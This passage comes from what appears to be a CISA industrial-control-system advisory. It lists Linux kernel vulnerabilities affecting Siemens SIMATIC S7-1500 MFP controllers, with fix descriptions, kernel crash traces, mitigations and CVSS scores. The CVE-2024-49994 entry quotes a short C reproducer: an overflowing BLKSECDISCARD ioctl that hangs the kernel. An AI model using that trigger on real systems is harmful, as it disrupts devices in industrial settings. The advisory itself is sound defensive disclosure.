<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H">CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2024-28956</a></h3>
<div class="csaf-accordion-content">
<p>Exposure of Sensitive Information in Shared Microarchitectural Structures during Transient Execution for some Intel(R) Processors may allow an authenticated user to potentially enable information disclosure via local access.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2024-28956">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SIMATIC S7-1500 CPU 1518(F)-4 PN/DP MFP</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AC0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AC0) &gt;= V3.1.6, SIPLUS S7-1500 CPU 1518-4 PN/DP MFP (6AG1518-4AX00-4AC0) &gt;= V3.1.6</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>Limit access to the interactive shell of the additional GNU/Linux subssytem to trusted personnel only.</p>
<p><strong>Mitigation</strong><br>Only build and run applications from trusted sources.</p>
<p><strong>None available</strong><br>Currently no fix is available</p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/1421.html">CWE-1421 Exposure of Sensitive Information in Shared Microarchitectural Structures during Transient Execution</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>5.6</td>
<td>MEDIUM</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:C/C:H/I:N/A:N">CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:C/C:H/I:N/A:N</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2024-36903</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: ipv6: Fix potential uninit-value access in __ip6_make_skb() As it was done in commit fc1092f51567 ("ipv4: Fix uninit-value access in __ip_make_skb()") for IPv4, check FLOWI_FLAG_KNOWN_NH on fl6-&gt;flowi6_flags instead of testing HDRINCL on the socket to avoid a race condition which causes uninit-value access.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2024-36903">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SIMATIC S7-1500 CPU 1518(F)-4 PN/DP MFP</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AC0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AC0) &gt;= V3.1.6, SIPLUS S7-1500 CPU 1518-4 PN/DP MFP (6AG1518-4AX00-4AC0) &gt;= V3.1.6</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>Limit access to the interactive shell of the additional GNU/Linux subssytem to trusted personnel only.</p>
<p><strong>Mitigation</strong><br>Only build and run applications from trusted sources.</p>
<p><strong>None available</strong><br>Currently no fix is available</p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/362.html">CWE-362 Concurrent Execution using Shared Resource with Improper Synchronization ('Race Condition')</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>5.6</td>
<td>MEDIUM</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L">CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2024-36927</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: ipv4: Fix uninit-value access in __ip_make_skb() KMSAN reported uninit-value access in __ip_make_skb() [1]. __ip_make_skb() tests HDRINCL to know if the skb has icmphdr. However, HDRINCL can cause a race condition. If calling setsockopt(2) with IP_HDRINCL changes HDRINCL while __ip_make_skb() is running, the function will access icmphdr in the skb even if it is not included. This causes the issue reported by KMSAN. Check FLOWI_FLAG_KNOWN_NH on fl4-&gt;flowi4_flags instead of testing HDRINCL on the socket. Also, fl4-&gt;fl4_icmp_type and fl4-&gt;fl4_icmp_code are not initialized. These are union in struct flowi4 and are implicitly initialized by flowi4_init_output(), but we should not rely on specific union layout. Initialize these explicitly in raw_sendmsg(). [1] BUG: KMSAN: uninit-value in __ip_make_skb+0x2b74/0x2d20 net/ipv4/ip_output.c:1481 __ip_make_skb+0x2b74/0x2d20 net/ipv4/ip_output.c:1481 ip_finish_skb include/net/ip.h:243 [inline] ip_push_pending_frames+0x4c/0x5c0 net/ipv4/ip_output.c:1508 raw_sendmsg+0x2381/0x2690 net/ipv4/raw.c:654 inet_sendmsg+0x27b/0x2a0 net/ipv4/af_inet.c:851 sock_sendmsg_nosec net/socket.c:730 [inline] __sock_sendmsg+0x274/0x3c0 net/socket.c:745 __sys_sendto+0x62c/0x7b0 net/socket.c:2191 __do_sys_sendto net/socket.c:2203 [inline] __se_sys_sendto net/socket.c:2199 [inline] __x64_sys_sendto+0x130/0x200 net/socket.c:2199 do_syscall_64+0xd8/0x1f0 arch/x86/entry/common.c:83 entry_SYSCALL_64_after_hwframe+0x6d/0x75 Uninit was created at: slab_post_alloc_hook mm/slub.c:3804 [inline] slab_alloc_node mm/slub.c:3845 [inline] kmem_cache_alloc_node+0x5f6/0xc50 mm/slub.c:3888 kmalloc_reserve+0x13c/0x4a0 net/core/skbuff.c:577 __alloc_skb+0x35a/0x7c0 net/core/skbuff.c:668 alloc_skb include/linux/skbuff.h:1318 [inline] __ip_append_data+0x49ab/0x68c0 net/ipv4/ip_output.c:1128 ip_append_data+0x1e7/0x260 net/ipv4/ip_output.c:1365 raw_sendmsg+0x22b1/0x2690 net/ipv4/raw.c:648 inet_sendmsg+0x27b/0x2a0 net/ipv4/af_inet.c:851 sock_sendmsg_nosec net/socket.c:730 [inline] __sock_sendmsg+0x274/0x3c0 net/socket.c:745 __sys_sendto+0x62c/0x7b0 net/socket.c:2191 __do_sys_sendto net/socket.c:2203 [inline] __se_sys_sendto net/socket.c:2199 [inline] __x64_sys_sendto+0x130/0x200 net/socket.c:2199 do_syscall_64+0xd8/0x1f0 arch/x86/entry/common.c:83 entry_SYSCALL_64_after_hwframe+0x6d/0x75 CPU: 1 PID: 15709 Comm: syz-executor.7 Not tainted 6.8.0-11567-gb3603fcb79b1 #25 Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.16.3-1.fc39 04/01/2014</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2024-36927">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SIMATIC S7-1500 CPU 1518(F)-4 PN/DP MFP</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AC0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AC0) &gt;= V3.1.6, SIPLUS S7-1500 CPU 1518-4 PN/DP MFP (6AG1518-4AX00-4AC0) &gt;= V3.1.6</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>Limit access to the interactive shell of the additional GNU/Linux subssytem to trusted personnel only.</p>
<p><strong>Mitigation</strong><br>Only build and run applications from trusted sources.</p>
<p><strong>None available</strong><br>Currently no fix is available</p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/20.html">CWE-20 Improper Input Validation</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>4.7</td>
<td>MEDIUM</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H">CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2024-42079</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: gfs2: Fix NULL pointer dereference in gfs2_log_flush In gfs2_jindex_free(), set sdp-&gt;sd_jdesc to NULL under the log flush lock to provide exclusion against gfs2_log_flush(). In gfs2_log_flush(), check if sdp-&gt;sd_jdesc is non-NULL before dereferencing it. Otherwise, we could run into a NULL pointer dereference when outstanding glock work races with an unmount (glock_work_func -&gt; run_queue -&gt; do_xmote -&gt; inode_go_sync -&gt; gfs2_log_flush).</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2024-42079">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SIMATIC S7-1500 CPU 1518(F)-4 PN/DP MFP</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AC0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AC0) &gt;= V3.1.6, SIPLUS S7-1500 CPU 1518-4 PN/DP MFP (6AG1518-4AX00-4AC0) &gt;= V3.1.6</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>Limit access to the interactive shell of the additional GNU/Linux subssytem to trusted personnel only.</p>
<p><strong>Mitigation</strong><br>Only build and run applications from trusted sources.</p>
<p><strong>None available</strong><br>Currently no fix is available</p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/476.html">CWE-476 NULL Pointer Dereference</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>5.5</td>
<td>MEDIUM</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H">CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2024-46786</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: fscache: delete fscache_cookie_lru_timer when fscache exits to avoid UAF The fscache_cookie_lru_timer is initialized when the fscache module is inserted, but is not deleted when the fscache module is removed. If timer_reduce() is called before removing the fscache module, the fscache_cookie_lru_timer will be added to the timer list of the current cpu. Afterwards, a use-after-free will be triggered in the softIRQ after removing the fscache module, as follows: ================================================================== BUG: unable to handle page fault for address: fffffbfff803c9e9 PF: supervisor read access in kernel mode PF: error_code(0x0000) - not-present page PGD 21ffea067 P4D 21ffea067 PUD 21ffe6067 PMD 110a7c067 PTE 0 Oops: Oops: 0000 [#1] PREEMPT SMP KASAN PTI CPU: 1 UID: 0 PID: 0 Comm: swapper/1 Tainted: G W 6.11.0-rc3 #855 Tainted: [W]=WARN RIP: 0010:__run_timer_base.part.0+0x254/0x8a0 Call Trace: tmigr_handle_remote_up+0x627/0x810 __walk_groups.isra.0+0x47/0x140 tmigr_handle_remote+0x1fa/0x2f0 handle_softirqs+0x180/0x590 irq_exit_rcu+0x84/0xb0 sysvec_apic_timer_interrupt+0x6e/0x90 asm_sysvec_apic_timer_interrupt+0x1a/0x20 RIP: 0010:default_idle+0xf/0x20 default_idle_call+0x38/0x60 do_idle+0x2b5/0x300 cpu_startup_entry+0x54/0x60 start_secondary+0x20d/0x280 common_startup_64+0x13e/0x148 Modules linked in: [last unloaded: netfs] ================================================================== Therefore delete fscache_cookie_lru_timer when removing the fscahe module.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2024-46786">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SIMATIC S7-1500 CPU 1518(F)-4 PN/DP MFP</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AC0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AC0) &gt;= V3.1.6, SIPLUS S7-1500 CPU 1518-4 PN/DP MFP (6AG1518-4AX00-4AC0) &gt;= V3.1.6</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>Limit access to the interactive shell of the additional GNU/Linux subssytem to trusted personnel only.</p>
<p><strong>Mitigation</strong><br>Only build and run applications from trusted sources.</p>
<p><strong>None available</strong><br>Currently no fix is available</p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/20.html">CWE-20 Improper Input Validation</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>7.8</td>
<td>HIGH</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H">CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2024-47736</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: erofs: handle overlapped pclusters out of crafted images properly syzbot reported a task hang issue due to a deadlock case where it is waiting for the folio lock of a cached folio that will be used for cache I/Os. After looking into the crafted fuzzed image, I found it's formed with several overlapped big pclusters as below: Ext: logical offset | length : physical offset | length 0: 0.. 16384 | 16384 : 151552.. 167936 | 16384 1: 16384.. 32768 | 16384 : 155648.. 172032 | 16384 2: 32768.. 49152 | 16384 : 537223168.. 537239552 | 16384 ... Here, extent 0/1 are physically overlapped although it's entirely _impossible_ for normal filesystem images generated by mkfs. First, managed folios containing compressed data will be marked as up-to-date and then unlocked immediately (unlike in-place folios) when compressed I/Os are complete. If physical blocks are not submitted in the incremental order, there should be separate BIOs to avoid dependency issues. However, the current code mis-arranges z_erofs_fill_bio_vec() and BIO submission which causes unexpected BIO waits. Second, managed folios will be connected to their own pclusters for efficient inter-queries. However, this is somewhat hard to implement easily if overlapped big pclusters exist. Again, these only appear in fuzzed images so let's simply fall back to temporary short-lived pages for correctness. Additionally, it justifies that referenced managed folios cannot be truncated for now and reverts part of commit 2080ca1ed3e4 ("erofs: tidy up `struct z_erofs_bvec`") for simplicity although it shouldn't be any difference.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2024-47736">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SIMATIC S7-1500 CPU 1518(F)-4 PN/DP MFP</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AC0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AC0) &gt;= V3.1.6, SIPLUS S7-1500 CPU 1518-4 PN/DP MFP (6AG1518-4AX00-4AC0) &gt;= V3.1.6</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>Limit access to the interactive shell of the additional GNU/Linux subssytem to trusted personnel only.</p>
<p><strong>Mitigation</strong><br>Only build and run applications from trusted sources.</p>
<p><strong>None available</strong><br>Currently no fix is available</p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/404.html">CWE-404 Improper Resource Shutdown or Release</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>5.5</td>
<td>MEDIUM</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H">CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2024-47809</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: dlm: fix possible lkb_resource null dereference This patch fixes a possible null pointer dereference when this function is called from request_lock() as lkb-&gt;lkb_resource is not assigned yet, only after validate_lock_args() by calling attach_lkb(). Another issue is that a resource name could be a non printable bytearray and we cannot assume to be ASCII coded. The log functionality is probably never being hit when DLM is used in normal way and no debug logging is enabled. The null pointer dereference can only occur on a new created lkb that does not have the resource assigned yet, it probably never hits the null pointer dereference but we should be sure that other changes might not change this behaviour and we actually can hit the mentioned null pointer dereference. In this patch we just drop the printout of the resource name, the lkb id is enough to make a possible connection to a resource name if this exists.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2024-47809">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SIMATIC S7-1500 CPU 1518(F)-4 PN/DP MFP</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AC0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AC0) &gt;= V3.1.6, SIPLUS S7-1500 CPU 1518-4 PN/DP MFP (6AG1518-4AX00-4AC0) &gt;= V3.1.6</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>Limit access to the interactive shell of the additional GNU/Linux subssytem to trusted personnel only.</p>
<p><strong>Mitigation</strong><br>Only build and run applications from trusted sources.</p>
<p><strong>None available</strong><br>Currently no fix is available</p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/476.html">CWE-476 NULL Pointer Dereference</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>5.5</td>
<td>MEDIUM</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H">CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2024-49968</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: ext4: filesystems without casefold feature cannot be mounted with siphash When mounting the ext4 filesystem, if the default hash version is set to DX_HASH_SIPHASH but the casefold feature is not set, exit the mounting.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2024-49968">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SIMATIC S7-1500 CPU 1518(F)-4 PN/DP MFP</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AC0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AC0) &gt;= V3.1.6, SIPLUS S7-1500 CPU 1518-4 PN/DP MFP (6AG1518-4AX00-4AC0) &gt;= V3.1.6</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>Limit access to the interactive shell of the additional GNU/Linux subssytem to trusted personnel only.</p>
<p><strong>Mitigation</strong><br>Only build and run applications from trusted sources.</p>
<p><strong>None available</strong><br>Currently no fix is available</p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/20.html">CWE-20 Improper Input Validation</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>5.5</td>
<td>MEDIUM</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H">CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2024-49994</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: block: fix integer overflow in BLKSECDISCARD I independently rediscovered commit 22d24a544b0d49bbcbd61c8c0eaf77d3c9297155 block: fix overflow in blk_ioctl_discard() but for secure erase. Same problem: uint64_t r[2] = {512, 18446744073709551104ULL}; ioctl(fd, BLKSECDISCARD, r); will enter near infinite loop inside blkdev_issue_secure_erase(): a.out: attempt to access beyond end of device loop0: rw=5, sector=3399043073, nr_sectors = 1024 limit=2048 bio_check_eod: 3286214 callbacks suppressed</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2024-49994">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SIMATIC S7-1500 CPU 1518(F)-4 PN/DP MFP</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AC0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AC0) &gt;= V3.1.6, SIPLUS S7-1500 CPU 1518-4 PN/DP MFP (6AG1518-4AX00-4AC0) &gt;= V3.1.6</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>Limit access to the interactive shell of the additional GNU/Linux subssytem to trusted personnel only.</p>
<p><strong>Mitigation</strong><br>Only build and run applications from trusted sources.</p>
<p><strong>None available</strong><br>Currently no fix is available</p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/190.html">CWE-190 Integer Overflow or Wraparound</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>5.5</td>
<td>MEDIUM</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H">CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2024-49998</a></h3>
<div class="csaf-accordion-content">
